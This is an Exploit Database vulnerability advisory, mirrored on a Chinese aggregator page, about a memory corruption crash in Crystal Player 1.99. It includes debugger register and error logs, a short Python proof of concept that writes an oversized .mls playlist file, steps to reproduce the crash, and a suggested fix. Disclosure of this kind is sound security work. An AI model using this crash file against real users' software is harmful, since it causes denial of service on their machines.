Crystal Player 1.99 – Memory Corruption

• Exploit Database
• 12 阅读

• 作者： Kapil Soni
  日期： 2015-01-21
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35869/

• Document Title:
  ===============
  Crystal Player 1.99 - Memory Corruption Vulnerability
  
  Date:
  =============
  21/01/2015
  
  Vendor Homepage: 
  ================
  http://www.crystalreality.com/
  
  Abstract Advisory Information:
  ==============================
  Memory Corruption Vulnerability on Crystal Player 1.99.
  
  Affected Product(s):
  ====================
  Crystal Player 1.99
  
  Exploitation Technique:
  =======================
  Local
  
  Severity Level:
  ===============
  Medium
  
  Technical Details & Description:
  ================================
  A Memory Corruption Vulnerability is detected on Crystal Player 1.99. An attacker can crash the software by using .mls file. 
  Attackers can crash the software local by user inter action over mls (playlist).
  
  --- DEBUG LOG ---
  ///registers
  EAX 00000000
  ECX 0006FE24
  EDX 0006FE24
  EBX 0013014C
  ESP 0006F300
  EBP 00060041
  ESI 00FF4A00
  EDI 00000001
  EIP 0040F933 Crystal.0040F933
  C 0ES 0023 32bit 0(FFFFFFFF)
  P 1CS 001B 32bit 0(FFFFFFFF)
  A 1SS 0023 32bit 0(FFFFFFFF)
  Z 0DS 0023 32bit 0(FFFFFFFF)
  S 1FS 003B 32bit 7FFDE000(FFF)
  T 0GS 0000 NULL
  D 0
  O 0LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
  EFL 00010296 (NO,NB,NE,A,S,PE,L,LE)
  ST0 empty
  ST1 empty
  ST2 empty
  ST3 empty
  ST4 empty
  ST5 empty
  ST6 empty
  ST7 empty
   3 2 1 0E S P U O Z D I
  FST 0000Cond 0 0 0 0Err 0 0 0 0 0 0 0 0(GT)
  FCW 027FPrec NEAR,53Mask1 1 1 1 1 1
  
  
  
  --- ERROR LOG ---
  Crystal+0xf933:
  0040f933 8b5510mov edx,dword ptr [ebp+10h] ss:0023:00060051=????????
  
  
  00060051 doesnt exist in the program aka not allowed .. so memcopy fails...
  
  
  EXCEPTION_RECORD:ffffffff -- (.exr 0xffffffffffffffff)
  ExceptionAddress: 0040f933 (Crystal+0xf933)
  
  Access violation when reading [00060051]
  
  Proof of Concept (PoC):
  =======================
  This vulnerabilities can be exploited by local attackers with userinteraction ...
  
  #!/usr/bin/python
  
  buffer = "A"*30000
  
  filename = "Crash"+".mls"
  file = open(filename, 'w')
  file.write(buffer)
  file.close()
  print "[] Successfully MLS Created []"
  
  
  How to perform:
  =======================
  1) Open Immunity Debugger and attach Crystal Player 1.99 
  2) Run it, Now move .mls file that we generated by our python script to the player
  3) Once again you have to move the same file in Crystal Player 1.99 for adding second playlist. 
  
  When you perform above steps so application will crash. Analyze it on Immunity.
  
  Solution - Fix & Patch:
  =======================
  Restrict working maximum size & set a own exception-handling for over-sized requests.
  
  Security Risk:
  ==============
  The security risk of the vulnerability is estimated as medium because of the local crash method.
  
  Authors:
  ==================
  Kapil Soni (Haxinos)